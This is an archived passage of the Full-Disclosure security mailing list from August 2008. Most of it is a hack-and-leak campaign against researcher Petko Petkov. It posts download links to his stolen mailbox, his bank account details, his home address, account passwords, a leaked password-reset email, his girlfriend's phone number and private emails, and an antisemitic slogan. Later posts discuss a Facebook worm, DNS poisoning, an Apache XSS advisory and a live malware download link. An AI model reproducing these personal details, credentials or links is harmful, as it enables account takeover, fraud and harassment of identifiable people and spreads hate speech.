'@@@@< $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$)>@@@@>' '<@@@@$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$@@@@>' '<@@@@$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$@@@@>' '<@@@@< .oooo. .$$@@@@>' '<@@@@oo$$$$$$$o.. ..o$$@@@@>' '<@@@@$$$$$$$$$$$$$oooooooo$$$$$@@@@>' '<@@@@'$$$$$$$$$$$$$$$$$$$$$@@@@>' '<@@@@< ~"SSSSSS"~ >@@@@>' '<@@@@< >@@@@>' '<@@@@< >@@@@>' '<@@@@< >@@@@>' '<@@@@<>@@@@>' '<@@@@@@>' '<@@>' TO PROTECT THE INNOCENT, TO SERVE FOR GREAT JUSTICE, TO SPREAD JOY AND HAPPINESS, TO BRING RUIN AND DESPAIR TO THE GUILTY, TO PREPARE HUMANKIND FOR THE SHOWDOWN OF JEWS, HERE BE INTERNET SUPERHEROS... * WE ARE WATCHING * what you have all been waiting patiently for: ============================================= http://www.megaupload.com/?d=5LMTT6H2 pdp_2005-2007-mbox.part01.rar http://www.megaupload.com/?d=WYFQWFHX pdp_2005-2007-mbox.part02.rar http://www.megaupload.com/?d=SUY1TSC0 pdp_2005-2007-mbox.part03.rar http://www.megaupload.com/?d=O3F9Y6CL pdp_2005-2007-mbox.part04.rar http://www.megaupload.com/?d=TY800FNS pdp_2005-2007-mbox_files.md5 http://www.megaupload.com/?d=ASCQ01VL pdp_2005-2007-mbox_files.sha1 http://www.megaupload.com/?d=IG4KUTRZ pdp_2005-2007- mbox_files.sha256 web version for mirroring and browsing (please mirror! ;>) ========================================================== http://gnucitizen.blackapplehost.com/index.html With love, the Great Council of Internet Superheros. "To protect exposure and serve ruin" -----BEGIN PGP SIGNATURE----- Charset: UTF8 Version: Hush 3.0 Note: This signature can be verified at https://www.hushtools.com/verify wpwEAQMCAAYFAkiaRJkACgkQ5g5u/REitpZgpgQAgwNg+h/IJU9sCXpA/iioDo9QIrSv sWLAPHv2SQpCP2RCSUa8xQDXnvA6zuPLYevwwx6ZajMXeypT0MlwcV3nbN8TH/o6NYVz +Tq2UEv/StXvN20fTcsFaXX6ZbjKIroW2vuZDEzMIDIqCqbuV90t2cwW6q7lwAWGN6Ot Vih+Bqk= =iIf7 -----END PGP SIGNATURE----- -- Click to become a master chef, own a restaurant and make millions. http://tagline.hushmail.com/fc/Ioyw6h4eAFckL6or2Y7VcAhuuGcbSV0kZEYxzNvgTymEoJpeVNuuBi/ From internetsuperheros at hushmail.com Thu Aug 7 01:44:53 2008 From: internetsuperheros at hushmail.com (internetsuperheros at hushmail.com) Date: Thu, 07 Aug 2008 02:44:53 +0200 Subject: [Full-disclosure] Petko D. Petkov files unleashed, guilty by Internet council Message-ID: <20080807004454.5625811803C@mailserver5.hushmail.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 bl4qh4t l1b3r4t10n 4rmy presents: the pdp files =============================================== The Great Council of Internet Superheros, with help of bl4qh4t l1b3r4t10n 4rmy commandos, has condemned Petko D. Petkov to public exposure, continuous siege and compromise of his electronic and networked assets. Petko D. Petkov has been accused and declared guilty of several crimes against God, Humankind, Honor, the Queen and his Mother (wherever her grave is located in Poland): 01. Extreme media and press whoring. 02. Flagrant behavior and lack of discretion and respect for the spirit and tradition of hacking. 03. Claiming hacker status. 04. Pretending to be ethical while conducting illegal and morally questionable behavior. 05. Cheating on his anorexic, sex-starved girlfriend. 06. Excessive mailbox usage and size (Note: we are superheros but we don't like to archive 2GB mailbox files. Next time make it easier and help us by cleaning up a bit). 07. Animal cruelty (killing bugs and selling them to ZDI and iDEFENSE). 08. Waste of public and Internet resources. 09. Using the hacker word for self-promotion and advertisement with commercial intent. 10. Attacking and mis-using the meaning of 0-day. 11. Exceeding the limit of mailing-list subscibrals and monthly post quotas set by the Government of the Internet Chamber of Commerce and Etcetera. The Great Council of Internet Superheros is now actively researching and investigating several security industry personalities for other suspected crimes. In the weeks and months to come, other individuals might be judged and accused of these dispicable activities. We will strike with greate vengeance and furious anger those who attempt to attack, discredit and offend our brothers. Using our amassed amounts of awesomeness, super powers and truely useful 0day, there will be no single networked machine capable of withstanding our acts of justice. Oh we say. Now get the mailbox files and mirror them, son. .<@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>. .<@@@@@@ $$$$$$$$$$$$$$$$$$$$$\^^^^^^/$$$$@@@>. .<@@@@@< .$$$$$'~ '~'$$$$$$$\ /$$$$$$>@@@@@>. .<@@@@@<' o$$$$$$ `'$$$$$$$$$$$$ '>@@@@@>. .<@@@@@<' o$$$$$$oo. )$$$$$$$$$$ '>@@@@@>. '<@@@@@< o$$$$$$$$$$$. >@@@@@>' '<@@@@< o$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$oooooo... >@@@@>' '@@@@< $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$)>@@@@>' '<@@@@$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$@@@@>' '<@@@@$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$@@@@>' '<@@@@< .oooo. .$$@@@@>' '<@@@@oo$$$$$$$o.. ..o$$@@@@>' '<@@@@$$$$$$$$$$$$$oooooooo$$$$$@@@@>' '<@@@@'$$$$$$$$$$$$$$$$$$$$$@@@@>' '<@@@@< ~"SSSSSS"~ >@@@@>' '<@@@@< >@@@@>' '<@@@@< >@@@@>' '<@@@@< >@@@@>' '<@@@@<>@@@@>' '<@@@@@@>' '<@@>' TO PROTECT THE INNOCENT, TO SERVE FOR GREAT JUSTICE, TO SPREAD JOY AND HAPPINESS, TO BRING RUIN AND DESPAIR TO THE GUILTY, TO PREPARE HUMANKIND FOR THE SHOWDOWN OF JEWS, HERE BE INTERNET SUPERHEROS... * WE ARE WATCHING * what you have all been waiting patiently for: ============================================= http://www.megaupload.com/?d=5LMTT6H2 pdp_2005-2007-mbox.part01.rar http://www.megaupload.com/?d=WYFQWFHX pdp_2005-2007-mbox.part02.rar http://www.megaupload.com/?d=SUY1TSC0 pdp_2005-2007-mbox.part03.rar http://www.megaupload.com/?d=O3F9Y6CL pdp_2005-2007-mbox.part04.rar http://www.megaupload.com/?d=TY800FNS pdp_2005-2007-mbox_files.md5 http://www.megaupload.com/?d=ASCQ01VL pdp_2005-2007-mbox_files.sha1 http://www.megaupload.com/?d=IG4KUTRZ pdp_2005-2007- mbox_files.sha256 website for mirroring and browsing: ================================== http://gnucitizen.blackapplehost.com/index.html Love, the Great Council of Internet Superheros. "To protect exposure and serve ruin." -----BEGIN PGP SIGNATURE----- Charset: UTF8 Note: This signature can be verified at https://www.hushtools.com/verify Version: Hush 3.0 wpwEAQMCAAYFAkiaRUsACgkQ5g5u/REitpbx1AP+Ob/m90qjoBHPahihUHGuvpL/53E6 AtbXdUYzqmibxBYL8C+Fi7X8wfqdw6j4Y48DZOXEDOXIBDZoLddhtYY3NfG6ICxtvDE6 EVvYL4O62pbNX6w3ZcTbAnmcBwF9sWX6r1XleQPgA3YhpQkVMWsFf88tHW1j6BleTcBo olMNO8g= =DleQ -----END PGP SIGNATURE----- -- Click here for great computer networking solutions! http://tagline.hushmail.com/fc/Ioyw6h4fM6l6hYz0fWZHl0fgC5QWNlzGIceMqDoM7kzcr804Xz4PQs/ From internetsuperheros at hushmail.com Thu Aug 7 02:30:39 2008 From: internetsuperheros at hushmail.com (Great Council of Internet Superheros) Date: Thu, 07 Aug 2008 03:30:39 +0200 Subject: [Full-disclosure] GNUCITIZEN Stumbleupon account revised Message-ID: <20080807013042.D498711803E@mailserver5.hushmail.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 The Chamber of Internet Justice has released the necessary changes to the Stumbleupon account used by Petko D. Petkov. Thanks to Kentucky Fried Chicken sponsoring, the account is now legal according to the Internet Law and Code of Misconduct. You can find pdp's updated page at: http://pdp.stumbleupon.com/ Kentucky Fried Chicken has sponsored this e-mail. Thank you. Love, the Great Council of Internet Superheros. "To protect exposure and serve ruin." -----BEGIN PGP SIGNATURE----- Charset: UTF8 Version: Hush 3.0 Note: This signature can be verified at https://www.hushtools.com/verify wpwEAQMCAAYFAkiaUAoACgkQ5g5u/REitpbKGwP/d5/Pp2xDUu+kdAVGQn/bhKcvdO97 I41PZzzzYLPhSekRZnycOGJz21bnRvmunFp0USaPMmO4wsNj1iLjsvoDqgd5qdZveQK4 Mcf73Zk1TBzbX1SHGGYEyJ6kWXMBkIBRv1QKzRZmXzz6nN/5lgLrSb5LQiDskBwEr49g QHkj3xs= =8NeX -----END PGP SIGNATURE----- -- Explore all of Europe's beauty! Click now for great vacation packages! http://tagline.hushmail.com/fc/Ioyw6h4ePhltxt9hegn4Glueq6XVxKQECZOLceDuk1ENwhqb0wfb2Q/ From internetsuperheros at hushmail.com Thu Aug 7 03:24:57 2008 From: internetsuperheros at hushmail.com (Great Council of Internet Superheros) Date: Thu, 07 Aug 2008 04:24:57 +0200 Subject: [Full-disclosure] More information on Petko D. Petkov Message-ID: <20080807022458.D375211803C@mailserver5.hushmail.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 The Great Council approved released of these highly sugared love emails, personal documents and other account information: Petko Dimitrov Petkov 135 CECIL ROAD ROCHESTER, ME1 2HP UK Girlfriend: Ivana Kalaydzhieva 135 Cecil Road, Rochester, Kent, ME1 2HP mobile: +44.7724496625 email: ivana.kalaydzhieva at gmail.com Date of birth: December 09,1982 Nationality: Bulgarian Martial status: Single (refer to pdp's mailbox for the CV attachment) Bank accounts the Council might find interesting: Branch Title: Richmond Surrey Address: 22 George Street Richmond Surrey Post code: TW9 1JW Sorting code: 601731 Account number : 10002189 Account Type: First reserve You may access GNUCITIZEN's accounts at: zone-h.org user: pdp password: pdpwned sourceforge.net user: pdp_gnucitizen password: pdpwned Delivered-To: pdp.gnucitizen at gmail.com Received: by 10.67.123.16 with SMTP id a16cs100221ugn; Thu, 22 Feb 2007 07:25:25 -0800 (PST) Received: by 10.100.93.5 with SMTP id q5mr426693anb.1172157924802; Thu, 22 Feb 2007 07:25:24 -0800 (PST) Return-Path: Received: from wx-out-0506.google.com (wx-out-0506.google.com [66.249.82.239]) by mx.google.com with ESMTP id 9si1009961wrl.2007.02.22.07.25.24; Thu, 22 Feb 2007 07:25:24 -0800 (PST) Received-SPF: pass (google.com: domain of ivana.kalaydzhieva at googlemail.com designates 66.249.82.239 as permitted sender) DomainKey-Status: bad (test mode) Received: by wx-out-0506.google.com with SMTP id i28so207558wxd for ; Thu, 22 Feb 2007 07:25:24 -0800 (PST) DKIM-Signature: a=rsa-sha1; c=relaxed/relaxed; d=googlemail.com; s=beta; h=domainkey-signature:received:received:message- id:date:from:to:subject:in-reply-to:mime-version:content- type:references; b=cLi5KiUN1XP8XBD8AVOb02rftjtQSgNC5oIWfA9dPF72M1+n6WzlB4N4llCKovdUNl Sb5XRvt/9kewm7s4tQuTCBVye4SdMgWHJt6D1JC7LZqxppxHKlbKZJ3+qjerXI6oqGzH Oo3v5WF3kP27v85wXfeUUa0m15EB1w+8KZr3Y= DomainKey-Signature: a=rsa-sha1; c=nofws; d=googlemail.com; s=beta; h=received:message-id:date:from:to:subject:in-reply-to:mime- version:content-type:references; b=ubdSodQ1iyb4RNkGa62efAA1quz2AqBt3SKsD+DkcsecgyuleMvgkp0bAZw9YqNNQs 5z3nRYOhfhaVjagx9Bht48jHb2jqs97L/7WdXNV8c1j/pGWUEVE5aiyE0ZT5ucoPJH7I AYpvsJIwPyrOnZopgloZzWGd8o6NbIFOyA6E0= Received: by 10.70.96.3 with SMTP id t3mr1355125wxb.1172157924124; Thu, 22 Feb 2007 07:25:24 -0800 (PST) Received: by 10.70.38.2 with HTTP; Thu, 22 Feb 2007 07:25:23 -0800 (PST) Message-ID: <44b8b4f10702220725x5ca9e8ay86168d80bb8836cf at mail.gmail.com> Date: Thu, 22 Feb 2007 15:25:23 +0000 From: "Ivana Kalaydzhieva" To: "pdp (architect)" Subject: Re: love u In-Reply-To: <6905b1570702220722v4a8cce4as4ce410036ba64d0c at mail.gmail.com> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_Part_9303_23832139.1172157923773" References: <44b8b4f10702220714y3714a252ofa58680ac46fbb75 at mail.gmail.com> <6905b1570702220722v4a8cce4as4ce410036ba64d0c at mail.gmail.com> - ------=_Part_9303_23832139.1172157923773 Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit Content-Disposition: inline tova beshe mnogo krasivo , koeto napravi. balgodarq ti mnogo On 2/22/07, pdp (architect) wrote: > > i love u 2 > > I . - . - . ! > L ", ," U > O " . " O > V E Y > > On 2/22/07, Ivana Kalaydzhieva wrote: Delivered-To: pdp.gnucitizen at gmail.com Received: by 10.100.45.2 with SMTP id s2cs127796ans; Sat, 7 Apr 2007 02:08:13 -0700 (PDT) Received: by 10.114.75.1 with SMTP id x1mr1517470waa.1175936893074; Sat, 07 Apr 2007 02:08:13 -0700 (PDT) Return-Path: Received: from colossus.datamerica.com (colossus.blackhat.com [216.231.63.50]) by mx.google.com with SMTP id n20si4698115pof.2007.04.07.02.08.12; Sat, 07 Apr 2007 02:08:13 -0700 (PDT) Received-SPF: pass (google.com: domain of cfp at blackhat.com designates 216.231.63.50 as permitted sender) Received: from mail-1.datamerica.com (mail-1.datamerica.com [10.168.25.25]) by colossus.datamerica.com with SMTP id l3798CMh019628 for ; Sat, 7 Apr 2007 02:08:12 -0700 (PDT) Received: (qmail 21175 invoked from network); 7 Apr 2007 09:08:11 - 0000 Received: from store-1.datamerica.com (10.168.43.43) by mail-1.datamerica.com with SMTP; 7 Apr 2007 09:08:11 -0000 Received: from blackhat.com (localhost.blackhat.com [127.0.0.1]) by store-1.datamerica.com (8.13.4/8.13.4) with ESMTP id l378YUxt018840 for ; Sat, 7 Apr 2007 01:34:30 -0700 (PDT) (envelope-from cfp at blackhat.com) Date: Sat, 7 Apr 2007 01:34:25 -0700 From: cfp at blackhat.com To: pdp.gnucitizen at gmail.com Message-Id: <461757911a6b5_14fc640413a0366c0 at store- 1.datamerica.com.tmail> Subject: Your password is ... Content-Type: text/plain; charset=utf-8 A password reset was requested for your Black Hat CFP system account. Your username is: pdp.gnucitizen Your new password is: KRBL5wqLIN Please login and change it to something more memorable. Thank you, The Black Hat CFP Team - ------------------- A nice recommendation letter of Petkov's girlfriend (verbatim copy, they clearly don't know how to spell-check): ?D&D? PUBLIC RELATIONS AGENCY 1, KR. SARAFOV STR. 1164 SOFIA, BULGARIA To whom it may concerned: Reference for Miss Ivana Kalaydzhieva I've known Ivana Kalaydzhieva since January 2002 , when she 'd been employed by ?D&D? agency as a Senior Account Manager. During this period She'd been not only responsible for the maintaining the relations with the media, but also for the creation and the execution of various communications strategies and projects. Providing highest professional consulting , Ivana was capable to switch into one task to another without any difficulties and hesitation. Her ability to remain unflustered during frenzied periods like crisis situations and major campaigns proves her ability to work well under pressure and not to make any compromises with the quality of service. Further more, the willingness to seek new ways to explore her creativity and knowledge makes her one of the best and remarkable employees we've ever had! Ivana would be a tremendous asset for your company and has my highest recommendation! Please let me know if you need further information! Your Sincerely, Victoria Encheva PR Manager ?D&D? PR Agency - -------------------------- Petkov's brilliant XSS book contract excerpt: <...> We are very happy to learn that you have agreed to prepare a contribution for XSS Exploits: Cross Site Scripting Attacks and Defense (the ?Work?), tentatively entitled: Building the Fundemental Toolkit - Analyzing HTTP Traffix with Firefox Extensions ? LiveHTTPHeaders, Building the Fundemental Toolkit - Automating Inspection ? GreaseMonkey, Building the Fundemental Toolkit - Debugging DHTML With Firefox Extensions - DOM Inspector Firefox Extension * Building the Fundemental Toolkit - Debugging DHTML With Firefox Extensions - FireBug Firefox Extension, Cross-Site Scripting - DOM- based, Cross-Site Scripting - Non-Persistent, Cross-Site Scripting ? Persistent, Exploit Frameworks ? AttackAPI, Exploit Frameworks ? BeEF, Intranet Hacking - Port scanning (the ?Contribution?), to be published by Syngress, an imprint of Elsevier Inc. (the ?Publisher?). <...> Love, the Great Council of Internet Superheros. "To protect exposure and serve ruin." -----BEGIN PGP SIGNATURE----- Charset: UTF8 Note: This signature can be verified at https://www.hushtools.com/verify Version: Hush 3.0 wpwEAQMCAAYFAkiaXMUACgkQ5g5u/REitpYRqwP7BC8Fe0eCaXHfSBuh8e+XEgwEeDss hHSSCv5EfNBq6a9ynknInSJPdBNVGj040qthYPpJEblwU8p/rmtlCjZHVHovj2YwfQws gqazymO80Uvrv9IVsCNRUojNJhrhElxlBB4WQuQ5Jq9ZeIsp5GrTu6PYeLcskjaysbkK rkQF0zQ= =o9Mp -----END PGP SIGNATURE----- -- Click here for great computer networking solutions! http://tagline.hushmail.com/fc/Ioyw6h4fM6maE2TvJHgaxNdUnKKkaIlfLBCW01RSqlBtEmkCybZlhe/ -------------- next part -------------- A non-text attachment was scrubbed... Name: petkovgf.jpg Type: image/jpeg Size: 42750 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080807/67f5266f/attachment.jpg -------------- next part -------------- An embedded and charset-unspecified text was scrubbed... Name: petkovgf.jpg.sig Url: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080807/67f5266f/attachment.ksh From infosecdramareport at gmail.com Thu Aug 7 05:14:53 2008 From: infosecdramareport at gmail.com (InfoSec DramaReport) Date: Wed, 6 Aug 2008 21:14:53 -0700 Subject: [Full-disclosure] Kaminsky Quittinq? Coffee Shop Inevitable? Message-ID: 8/6/2008 An Information Security Drama Report Exclusive It was BlackHat Vegas 2008 at the Prestigious Pwnie Awards and tensions were running high. The audience had been waiting in anticipation for the announcement of the winner of the "Most Overhyped Bug" category. Nominees included pagvac's "BT Home Hub authentication bypass", Symantec's "Adobe Flash Player non-0day remote code execution", and Dan Kaminsky's "Unspecified DNS cache poisoning vulnerability". However, while the competition was fierce, there was one obvious crowd favorite as the presenters pointed out by saying, "sixty percent of the nominations in this category were for Dan Kaminsky's Bug". After a light hearted description of the nominated bugs and an impromptu drum roll the winner was announced... "Dan Kaminsky!". The crowd applauded. Somewhat to the surprise of the audience, Dan approached the podium, accepted the award, and for his speech he was paraphrased as saying, "There are the kind people who fix bugs and there are the kind of people who find bugs. I'm glad to be both." Dan then proceeded to slam the microphone down on the podium before going briefly back to his seat after which, as one attendee put it, "[Dan] strode out of the room with his head held up high, Pawnie in hand, and a smirk on his face". Dan's wife followed closely behind with their bags. Further eye witness reports say that Dan Kaminsky was seen immediately after the awards ceremony repeating the following phrase several times, "I'm done I'm just done" to his wife who appeared to be consoling him in the wake of his acceptance speech. Here at ISDR we can only speculate that this means the inevitable loss of yet another valued Information Security professional to the honest ranks of coffee shop or bar owners. Our editors and staff would like to let Dan Kaminsky know that he will be missed and if this year is any portent, a nominee and winner for a Pawnie Lifetime Achievement Award in 2009. Good luck and and God speed everyone in their unspecified DNS cache poisoning attacks. From juha-matti.laurio at netti.fi Thu Aug 7 06:00:13 2008 From: juha-matti.laurio at netti.fi (Juha-Matti Laurio) Date: Thu, 7 Aug 2008 08:00:13 +0300 (EEST) Subject: [Full-disclosure] [funsec] facebook messages worm Message-ID: <32463282.333111218085213497.JavaMail.juha-matti.laurio@netti.fi> It has the following mechanism according to McAfee: http://vil.nai.com/vil/content/v_148955.htm They use name W32/Koobface.worm and Kaspersky (Kaspersky Labs originally discovered this threat) uses name Net-Worm.Win32.Koobface.b. More information here too: http://www.pcmag.com/article2/0,2817,2327272,00.asp Juha-Matti "John C. A. Bambenek, GCIH, CISSP" [bambenek.infosec at gmail.com] kirjoitti: > What's the infection vector? URL Link? Rouge Facebook app? > > On Wed, Aug 6, 2008 at 4:44 PM, Gadi Evron wrote: > > > Hi all. > > > > There's a facebook (possibly worm) something malicious sending fake > > messages from real users (friends). > > > > The sample also has a remote drop site (verified by someone who shall > > remain nameless). > > > > This is possibly zlob, not verified. Thanks Nick Bilogorskiy for his help. > > > > Infection sites seen so far are on .pl domains. > > > > The AV industry will soon add detection. > > Facebook's security folks are very capable, so I am not worried on that > > front. > > > > It's not that we didn't expect this for a long time now, but... > > Be careful. Some users know to be careful in email.. but not on facebook. > > > > Note: unlike 2003 when we called everything a worm and the 90s when > > everything was a virus--this is a bot which also spreads/infects on > > facebook. > > > > Gadi. > > > > > > -- > > "You don't need your firewalls! Gadi is Israel's firewall." > > -- Itzik (Isaac) Cohen, "Computers czar", Senior Deputy to the > > Accountant General, > > Israel's Ministry of Finance, at the government's CIO conference, > > 2005. > > > > (after two very funny self-deprication quotes, time to even things up!) > > > > My profile and resume: > > http://www.linkedin.com/in/gadievron From pschmehl_lists at tx.rr.com Thu Aug 7 05:45:22 2008 From: pschmehl_lists at tx.rr.com (Paul Schmehl) Date: Wed, 06 Aug 2008 23:45:22 -0500 Subject: [Full-disclosure] Kaminsky Quittinq? Coffee Shop Inevitable? In-Reply-To: References: Message-ID: --On August 6, 2008 9:14:53 PM -0700 InfoSec DramaReport wrote: > 8/6/2008 > An Information Security Drama Report Exclusive > > > It was BlackHat Vegas 2008 at the Prestigious Pwnie Awards and > tensions were running high. The audience had been waiting in > anticipation for the announcement of the winner of the "Most Overhyped > Bug" category. Nominees included pagvac's "BT Home Hub authentication > bypass", Symantec's "Adobe Flash Player non-0day remote code > execution", and Dan Kaminsky's "Unspecified DNS cache poisoning > vulnerability". > Typical journalists. Don't even know that Kaminsky doesn't have a wife. The New York Times is looking for your talent. Paul Schmehl, If it isn't already obvious, my opinions are my own and not those of my employer. ****************************************** WARNING: Check the headers before replying -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pkcs7-signature Size: 3826 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080806/eb09670d/attachment.bin From research at sec-consult.com Thu Aug 7 09:25:30 2008 From: research at sec-consult.com (Bernhard Mueller) Date: Thu, 7 Aug 2008 10:25:30 +0200 Subject: [Full-disclosure] Whitepaper: DNS zone redelegation Message-ID: <1218097530.312.3.camel@b4byl0n> Newly emerging techniques of DNS cache poisoning have caused quite a stir recently, prompting security researchers to speculate on the nature of the issue, and naturally inducing press stunts by some individuals, including "accidential" information leaks and hasty exploit releases. Many other, more relaxed researchers, who had figured out the attack and had coded working exploits within a few hours (which, by the way, was incredibly easy to do, knowing that an undocumented attack actually existed), decided to coordinate with Dan Kaminsky, who had organized a huge multi-vendor security patch, and withhold information for the proposed 30 days. SEC Consult's researchers were among the first to write a working "fast cache poisoning" exploit, details of which will now be published in a whitepaper, which also includes some calculations on the reliability of the attack. The paper details a way of making DNS cache poisoning / response spoofing attacks more reliable. A caching server will store any NS delegation RRs if it receives a delegation which is "closer" to the answer than the nameservers it already knows. By spoofing replies that contain a delegation for a single node, the nameserver will eventually cache the delegation when we hit the right transfer id. http://www.sec-consult.com/whitepapers_e.html Regards, Bernhard -- _________________________________________ Bernhard Mueller Security Consultant SEC Consult Unternehmensberatung GmbH www.sec-consult.com A-1190 Vienna, Mooslackengasse 17 phone +43 1 8903043 34 fax +43 1 8903043 15 mobile +43 676 840301 718 email b.mueller at sec-consult.com Firmenbuch Wiener Neustadt: 227896t, UID: ATU56165223 Firmensitz: Prof. Dr. Stephan Korenstra?e 10, A-2700 Wiener Neustadt Advisor for your information security. From marc_bevand at rapid7.com Wed Aug 6 18:25:26 2008 From: marc_bevand at rapid7.com (Marc Bevand) Date: Wed, 6 Aug 2008 17:25:26 +0000 (UTC) Subject: [Full-disclosure] =?utf-8?q?Apache_HTTP_Server_mod=5Fproxy=5Fftp_?= =?utf-8?q?Wildcard_Characters_Cross-Site_Scripting?= Message-ID: Rapid7 Advisory R7-0033 Apache HTTP Server mod_proxy_ftp Wildcard Characters Cross-Site Scripting Discovered: July 25, 2008 Published: August 5, 2008 Revision: 1.1 http://www.rapid7.com/advisories/R7-0033 CVE: CVE-2008-2939 1. Affected system(s): KNOWN VULNERABLE: o Apache HTTP Server 2.2.9 (and earlier 2.2.x versions) o Apache HTTP Server 2.0.63 (and earlier 2.0.x versions) NOT VULNERABLE: o Apache HTTP Server 1.3.x (because mod_proxy_ftp doesn't support wildcard characters) 2. Summary The mod_proxy_ftp module of the Apache HTTP Server is vulnerable to a cross-site scripting vulnerability when handling requests with wildcard characters (aka globbing characters). 3. Vendor status and information Apache HTTP Server Project http://httpd.apache.org The developers were notified of this vulnerability on July 28, 2008 via the private security mailing list security at apache.org. They acknowledged it within 12 hours. On July 29, they assigned it a CVE ID. On August 5, the vulnerability was fixed in all SVN branches: o Commit to main trunk: http://svn.apache.org/viewvc?view=rev&revision=682868 o Commit to 2.2 branch: http://svn.apache.org/viewvc?view=rev&revision=682870 o Commit to 2.0 branch: http://svn.apache.org/viewvc?view=rev&revision=682871 4. Solution Upgrade to Apache HTTP Server 2.2.10 or 2.0.64 (as of August 6, these have not been released yet), or apply the patch from SVN commit r682868. 5. Detailed analysis When Apache HTTP Server is configured with proxy support ("ProxyRequests On" in the configuration file), and when mod_proxy_ftp is enabled to support FTP-over-HTTP, requests containing wildcard characters (asterisk, tilde, opening square bracket, etc) such as: GET ftp://host/* HTTP/1.0 lead to cross-site scripting in the response returned by mod_proxy_ftp: [...]

Directory of ftp://host/*

[...] To exploit this vulnerability, 'host' must be running an FTP server, and the last directory component of the path (the XSS payload) must be composed of at least 1 wildcard character and must not contain any forward slashes. In practice, this last requirement is not an obstacle at all to develop working exploits, example: ftp://host/* 6. Credit Discovered by Marc Bevand of Rapid7. 7. Contact Information Rapid7, LLC Email: advisory at rapid7.com Web: http://www.rapid7.com Phone: +1 (617) 247-1717 8. Disclaimer and Copyright Rapid7, LLC is not responsible for the misuse of the information provided in our security advisories. These advisories are a service to the professional security community. There are NO WARRANTIES with regard to this information. Any application or distribution of this information constitutes acceptance AS IS, at the user's own risk. This information is subject to change without notice. This advisory Copyright (C) 2008 Rapid7, LLC. Permission is hereby granted to redistribute this advisory, providing that no changes are made and that the copyright notices and disclaimers remain intact. From mbaiter2 at gmail.com Wed Aug 6 19:29:42 2008 From: mbaiter2 at gmail.com (Dr. Mark A. Baiter [Chief Scatological Consultant]) Date: Wed, 6 Aug 2008 23:59:42 +0530 Subject: [Full-disclosure] infected file ( can someone please report and take it down ? ) Message-ID: <9396129f0808061129i396fde00i61e83e3f721196a@mail.gmail.com> File link http://web292.webbox443.server-home.org/install.exe 77 kb - packed install.exe analysis link http://www.virustotal.com/analisis/4ebbd8e0045798cee6e505f79fe88671 -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080806/d358ce35/attachment.html From ge at linuxbox.org Wed Aug 6 22:50:16 2008 From: ge at linuxbox.org (Gadi Evron) Date: Wed, 6 Aug 2008 16:50:16 -0500 (CDT) Subject: [Full-disclosure] [funsec] facebook messages worm In-Reply-To: References: Message-ID: http://www.kaspersky.com/news?id=20757567 7 days of seeding to impact. Gadi. On Wed, 6 Aug 2008, Gadi Evron wrote: > Hi all. > > There's a facebook (possibly worm) something malicious sending fake > messages from real users (friends). > > The sample also has a remote drop site (verified by someone who shall > remain nameless). > > This is possibly zlob, not verified. Thanks Nick Bilogorskiy for his help. > > Infection sites seen so far are on .pl domains. > > The AV industry will soon add detection. > Facebook's security folks are very capable, so I am not worried on that > front. > > It's not that we didn't expect this for a long time now, but... > Be careful. Some users know to be careful in email.. but not on facebook. > > Note: unlike 2003 when we called everything a worm and the 90s when > everything was a virus--this is a bot which also spreads/infects on facebook. > > Gadi. > > > -- > "You don't need your firewalls! Gadi is Israel's firewall." > -- Itzik (Isaac) Cohen, "Computers czar", Senior Deputy to the Accountant General, > Israel's Ministry of Finance, at the government's CIO conference, 2005. > > (after two very funny self-deprication quotes, time to even things up!) > > My profile and resume: > http://www.linkedin.com/in/gadievron > _______________________________________________ > Fun and Misc security discussion for OT posts. > https://linuxbox.org/cgi-bin/mailman/listinfo/funsec > Note: funsec is a public and open mailing list. > From az-guy at hushmail.com Wed Aug 6 23:11:29 2008 From: az-guy at hushmail.com (az-guy at hushmail.com) Date: Wed, 06 Aug 2008 15:11:29 -0700 Subject: [Full-disclosure] No subject Message-ID: <20080806221130.D0C83158041@mailserver6.hushmail.com> Not just Rouge apps, it's much more widespread: other colors such as magenta, mauve, fuschia, and even the extremes of pink and purple can also be impacted. On Wed, Aug 6, 2008 at 2:56 PM, John C. A. Bambenek, GCIH, CISSP wrote: What's the infection vector? URL Link? Rouge Facebook app? On Wed, Aug 6, 2008 at 4:44 PM, Gadi Evron wrote: Hi all. There's a facebook (possibly worm) something malicious sending fake messages from real users (friends). The sample also has a remote drop site (verified by someone who shall remain nameless). This is possibly zlob, not verified. Thanks Nick Bilogorskiy for his help. Infection sites seen so far are on .pl domains. The AV industry will soon add detection. Facebook's security folks are very capable, so I am not worried on that front. It's not that we didn't expect this for a long time now, but... Be careful. Some users know to be careful in email.. but not on facebook. Note: unlike 2003 when we called everything a worm and the 90s when everything was a virus--this is a bot which also spreads/infects on facebook. Gadi. -- "You don't need your firewalls! Gadi is Israel's firewall." -- Itzik (Isaac) Cohen, "Computers czar", Senior Deputy to the Accountant General, Israel's Ministry of Finance, at the government's CIO conference, 2005. (after two very funny self-deprication quotes, time to even things up!) My profile and resume: http://www.linkedin.com/in/gadievron _______________________________________________ Fun and Misc security discussion for OT posts. https://linuxbox.org/cgi-bin/mailman/listinfo/funsec Note: funsec is a public and open mailing list. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- Click here for great computer networking solutions! 